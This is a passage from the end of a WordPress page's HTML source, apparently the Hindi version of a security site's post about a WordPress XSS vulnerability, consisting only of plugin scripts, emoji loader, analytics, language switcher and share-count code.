} )( "default", {"translation-revision-date":"2024-02-25 08:05:38+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n != 1;","lang":"hi_IN"},"Notifications":["\u0938\u0942\u091a\u0928\u093e\u090f\u0902"]}},"comment":{"reference":"wp-includes\/js\/dist\/a11y.js"}} );
//# sourceURL=wp-a11y-js-translations
</script>
<script id="wp-a11y-js" src="https://wp-security.org/wp-includes/js/dist/a11y.min.js?ver=af934e5259bc51b8718e"></script>
<script id="trp-dynamic-translator-js-extra">
var trp_data = {"trp_custom_ajax_url":"https://wp-security.org/wp-content/plugins/translatepress-multilingual/includes/trp-ajax.php","trp_wp_ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","trp_language_to_query":"hi_IN","trp_original_language":"en_US","trp_current_language":"hi_IN","trp_skip_selectors":["[data-no-translation]","[data-no-dynamic-translation]","[data-trp-translate-id-innertext]","script","style","head","trp-span","translate-press","[data-trp-translate-id]","[data-trpgettextoriginal]","[data-trp-post-slug]"],"trp_base_selectors":["data-trp-translate-id","data-trpgettextoriginal","data-trp-post-slug"],"trp_attributes_selectors":{"text":{"accessor":"outertext","attribute":false},"block":{"accessor":"innertext","attribute":false},"image_src":{"selector":"img[src]","accessor":"src","attribute":true},"submit":{"selector":"input[type='submit'],input[type='button'], input[type='reset']","accessor":"value","attribute":true},"placeholder":{"selector":"input[placeholder],textarea[placeholder]","accessor":"placeholder","attribute":true},"title":{"selector":"[title]","accessor":"title","attribute":true},"a_href":{"selector":"a[href]","accessor":"href","attribute":true},"button":{"accessor":"outertext","attribute":false},"option":{"accessor":"innertext","attribute":false},"aria_label":{"selector":"[aria-label]","accessor":"aria-label","attribute":true},"video_src":{"selector":"video[src]","accessor":"src","attribute":true},"video_poster":{"selector":"video[poster]","accessor":"poster","attribute":true},"video_source_src":{"selector":"video source[src]","accessor":"src","attribute":true},"audio_src":{"selector":"audio[src]","accessor":"src","attribute":true},"audio_source_src":{"selector":"audio source[src]","accessor":"src","attribute":true},"picture_image_src":{"selector":"picture image[src]","accessor":"src","attribute":true},"picture_source_srcset":{"selector":"picture source[srcset]","accessor":"srcset","attribute":true}},"trp_attributes_accessors":["outertext","innertext","src","value","placeholder","title","href","aria-label","poster","srcset"],"gettranslationsnonceregular":"5deae37847","showdynamiccontentbeforetranslation":"","skip_strings_from_dynamic_translation":[],"skip_strings_from_dynamic_translation_for_substrings":{"href":["amazon-adsystem","googleads","g.doubleclick"]},"duplicate_detections_allowed":"100","trp_translate_numerals_opt":"no","trp_no_auto_translation_selectors":["[data-no-auto-translation]"]};
//# sourceURL=trp-dynamic-translator-js-extra
</script>
<script id="trp-dynamic-translator-js" src="https://wp-security.org/wp-content/plugins/translatepress-multilingual/assets/js/trp-translate-dom-changes.js?ver=3.1.9"></script>
<script id="powerkit-js" src="https://wp-security.org/wp-content/plugins/powerkit/assets/js/_scripts.js?ver=3.0.7"></script>
<script id="swv-js" src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.6"></script>
<script id="contact-form-7-js-before">
var wpcf7 = {
"api": {
"root": "https:\/\/wp-security.org\/hi\/wp-json\/",
"namespace": "contact-form-7\/v1"
},
"cached": 1
};
//# sourceURL=contact-form-7-js-before
</script>
<script id="contact-form-7-js" src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.6"></script>
<script id="disqus_count-js-extra">
var countVars = {"disqusShortname":"wp-security-org"};
//# sourceURL=disqus_count-js-extra
</script>
<script id="disqus_count-js" src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.1.4"></script>
<script id="disqus_embed-js-extra">
var embedVars = {"disqusConfig":{"integration":"wordpress 3.1.4 7.0"},"disqusIdentifier":"803 https://wp-security.org/uncategorized/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","disqusShortname":"wp-security-org","disqusTitle":"Hong Kong Security NGO warns WordPress XSS(CVE20258685)","disqusUrl":"https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","postId":"803"};
//# sourceURL=disqus_embed-js-extra
</script>
<script id="disqus_embed-js" src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.1.4"></script>
<script id="powerkit-basic-elements-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/basic-elements/public/js/public-powerkit-basic-elements.js?ver=4.0.0"></script>
<script id="justifiedgallery-js" src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/jquery.justifiedGallery.min.js?ver=2.5.2"></script>
<script id="powerkit-justified-gallery-js-extra">
var powerkitJG = {"rtl":""};
//# sourceURL=powerkit-justified-gallery-js-extra
</script>
<script id="powerkit-justified-gallery-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/justified-gallery/public/js/public-powerkit-justified-gallery.js?ver=3.0.7"></script>
<script id="imagesloaded-js" src="https://wp-security.org/wp-includes/js/imagesloaded.min.js?ver=5.0.0"></script>
<script id="glightbox-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/glightbox.min.js?ver=3.0.7"></script>
<script id="powerkit-lightbox-js-extra">
var powerkit_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of","single_image_selectors":".entry-content img,.single .post-media img","gallery_selectors":".wp-block-gallery,.gallery","exclude_selectors":".sight-portfolio-area","zoom_icon":"1"};
//# sourceURL=powerkit-lightbox-js-extra
</script>
<script id="powerkit-lightbox-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/public-powerkit-lightbox.js?ver=3.0.7"></script>
<script id="powerkit-opt-in-forms-js-extra">
var opt_in = {"ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","warning_privacy":"Please confirm that you agree with our policies.","is_admin":"","server_error":"Server error occurred. Please try again later."};
//# sourceURL=powerkit-opt-in-forms-js-extra
</script>
<script id="powerkit-opt-in-forms-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/opt-in-forms/public/js/public-powerkit-opt-in-forms.js?ver=3.0.7"></script>
<script id="powerkit-pinterest-js" async="async" defer="defer" src="//assets.pinterest.com/js/pinit.js?ver=7.0"></script>
<script id="powerkit-pin-it-js-extra">
var powerkit_pinit_localize = {"image_selectors":".entry-content img","exclude_selectors":".cnvs-block-row,.cnvs-block-section,.cnvs-block-posts .entry-thumbnail,.cnvs-post-thumbnail,.pk-block-author,.pk-featured-categories img,.pk-inline-posts-container img,.pk-instagram-image,.pk-subscribe-image,.wp-block-cover,.pk-block-posts,.sight-portfolio-entry-link-page","only_hover":"1"};
//# sourceURL=powerkit-pin-it-js-extra
</script>
<script id="powerkit-pin-it-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/pinterest/public/js/public-powerkit-pin-it.js?ver=3.0.7"></script>
<script id="powerkit-scroll-to-top-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/scroll-to-top/public/js/public-powerkit-scroll-to-top.js?ver=3.0.7"></script>
<script id="powerkit-share-buttons-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/share-buttons/public/js/public-powerkit-share-buttons.js?ver=3.0.7"></script>
<script id="flickity-js" src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/flickity.pkgd.min.js?ver=2.5.2"></script>
<script id="powerkit-slider-gallery-js-extra">
var powerkit_sg_flickity = {"page_info_sep":" of "};
//# sourceURL=powerkit-slider-gallery-js-extra
</script>
<script id="powerkit-slider-gallery-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/slider-gallery/public/js/public-powerkit-slider-gallery.js?ver=3.0.7"></script>
<script id="powerkit-table-of-contents-js-extra">
var powerkit_toc_config = {"label_show":"Show","label_hide":"Hide"};
//# sourceURL=powerkit-table-of-contents-js-extra
</script>
<script id="powerkit-table-of-contents-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/table-of-contents/public/js/public-powerkit-table-of-contents.js?ver=3.0.7"></script>
<script id="magnific-popup-js" src="https://wp-security.org/wp-content/plugins/sight/render/js/jquery.magnific-popup.min.js?ver=1774098503"></script>
<script id="sight-block-script-js-extra">
var sight_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of"};
//# sourceURL=sight-block-script-js-extra
</script>
<script id="sight-block-script-js" src="https://wp-security.org/wp-content/plugins/sight/render/js/sight.js?ver=1774098503"></script>
<script id="colcade-js" src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/colcade.js?ver=2.5.2"></script>
<script id="object-fit-images-js" src="https://wp-security.org/wp-content/themes/squaretype/js/ofi.min.js?ver=3.2.3"></script>
<script id="csco-scripts-js-extra">
var csco_mega_menu = {"rest_url":"https://wp-security.org/hi/wp-json/csco/v1/menu-posts","current_lang":"","current_locale":"hi_IN"};
//# sourceURL=csco-scripts-js-extra
</script>
<script id="csco-scripts-js" src="https://wp-security.org/wp-content/themes/squaretype/js/scripts.js?ver=3.1.1"></script>
<script async data-wp-strategy="async" fetchpriority="low" id="comment-reply-js" src="https://wp-security.org/wp-includes/js/comment-reply.min.js?ver=7.0"></script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://wp-security.org/wp-includes/js/wp-emoji-release.min.js?ver=7.0"}}
</script>
<script type="module">
/*! This file is auto-generated */
const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
//# sourceURL=https://wp-security.org/wp-includes/js/wp-emoji-loader.min.js
</script>
<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;"><p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden data-no-translation="" data-trp-gettext="">सूचनाएँ</p><div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div><div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div></div>
<!-- Usermaven - privacy-friendly analytics tool -->
<script type="text/javascript">
(function () {
window.usermaven = window.usermaven || (function () { (window.usermavenQ = window.usermavenQ || []).push(arguments); })
var t = document.createElement('script'),
s = document.getElementsByTagName('script')[0];
t.defer = true;
t.id = 'um-tracker';
t.setAttribute('data-tracking-host', 'https://u.wp-security.org');
t.setAttribute('data-key', 'UMZaYew9Sp');
t.setAttribute('data-autocapture', 'true'); t.setAttribute('data-randomize-url', 'true');
t.src = 'https://u.wp-security.org/lib.js';
s.parentNode.insertBefore(t, s);
})();
</script>
<!-- / Usermaven -->
<nav
class="trp-language-switcher trp-floating-switcher trp-ls-dropdown trp-switcher-position-bottom"
style="--bg:#ffffffb2;--bg-hover:#0000000d;--text:#000000;--text-hover:#000000;--border:1px solid transparent;--border-radius:8px 8px 0px 0px;--flag-radius:2px;--flag-size:20px;--aspect-ratio:4/3;--font-size:16px;--switcher-width:auto;--switcher-padding:10px 0;--transition-duration:0.2s;--bottom:0px;--right:10vw"
role="navigation"
aria-label="वेबसाइट भाषा चयनकर्ता"
data-no-translation
>
<div class="trp-language-switcher-inner">
<div class="trp-language-item trp-language-item__current" title="Hindi" role="button" tabindex="0" aria-expanded="false" aria-label="Change language" aria-controls="trp-switcher-dropdown-list" data-no-translation><span class="trp-language-item-name">Hindi</span></div>
<div
class="trp-switcher-dropdown-list"
id="trp-switcher-dropdown-list"
role="group"
aria-label="उपलब्ध भाषाएँ"
hidden
inert
>
<a href="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="English" data-no-translation><span class="trp-language-item-name">English</span></a> <a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (Hong Kong)" data-no-translation><span class="trp-language-item-name">Chinese (Hong Kong)</span></a> <a href="https://wp-security.org/zh_cn/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (China)" data-no-translation><span class="trp-language-item-name">Chinese (China)</span></a> <a href="https://wp-security.org/es/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Spanish" data-no-translation><span class="trp-language-item-name">Spanish</span></a> <a href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="French" data-no-translation><span class="trp-language-item-name">French</span></a> </div>
</div>
</nav>
<script type="text/javascript">
"use strict";
(function($) {
$( window ).on( 'load', function() {
// Each All Share boxes.
$( '.pk-share-buttons-mode-rest' ).each( function() {
var powerkitButtonsIds = [],
powerkitButtonsBox = $( this );
// Check Counts.
if ( ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-counts' ) && ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) ) {
return;
}
powerkitButtonsBox.find( '.pk-share-buttons-item' ).each( function() {
if ( $( this ).attr( 'data-id' ).length > 0 ) {
powerkitButtonsIds.push( $( this ).attr( 'data-id' ) );
}
});
// Generate accounts data.
var powerkitButtonsData = {};
if( powerkitButtonsIds.length > 0 ) {
powerkitButtonsData = {
'ids' : powerkitButtonsIds.join(),
'post_id' : powerkitButtonsBox.attr( 'data-post-id' ),
'url' : powerkitButtonsBox.attr( 'data-share-url' ),
};
}
// Get results by REST API.
$.ajax({
type: 'GET',
url: 'https://wp-security.org/hi/wp-json/social-share/v1/get-shares',
data: powerkitButtonsData,
beforeSend: function(){
// Add Loading Class.
powerkitButtonsBox.addClass( 'pk-share-buttons-loading' );
},
success: function( response ) {
if ( ! $.isEmptyObject( response ) && ! response.hasOwnProperty( 'code' ) ) {
// Accounts loop.
$.each( response, function( index, data ) {
if ( index !== 'total_count' ) {
// Find Bsa Item.
var powerkitButtonsItem = powerkitButtonsBox.find( '.pk-share-buttons-item[data-id="' + index + '"]');
// Set Count.
if ( data.hasOwnProperty( 'count' ) && data.count ) {
powerkitButtonsItem.removeClass( 'pk-share-buttons-no-count' ).addClass( 'pk-share-buttons-item-count' );
powerkitButtonsItem.find( '.pk-share-buttons-count' ).html( data.count );
} else {
powerkitButtonsItem.addClass( 'pk-share-buttons-no-count' );
}
}
});
if ( powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) && response.hasOwnProperty( 'total_count' ) ) {
var powerkitButtonsTotalBox = powerkitButtonsBox.find( '.pk-share-buttons-total' );
if ( response.total_count ) {
powerkitButtonsTotalBox.find( '.pk-share-buttons-count' ).html( response.total_count );
powerkitButtonsTotalBox.show().removeClass( 'pk-share-buttons-total-no-count' );
}
}
}
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
},
error: function() {
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
}
});
});
});
})(jQuery);
</script>
</body>
</html>
<!--
Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com
Redis से PhpRedis (v6.3.0) का उपयोग करके 10988 वस्तुएं (1 एमबी) पुनः प्राप्त की गईं।.
-->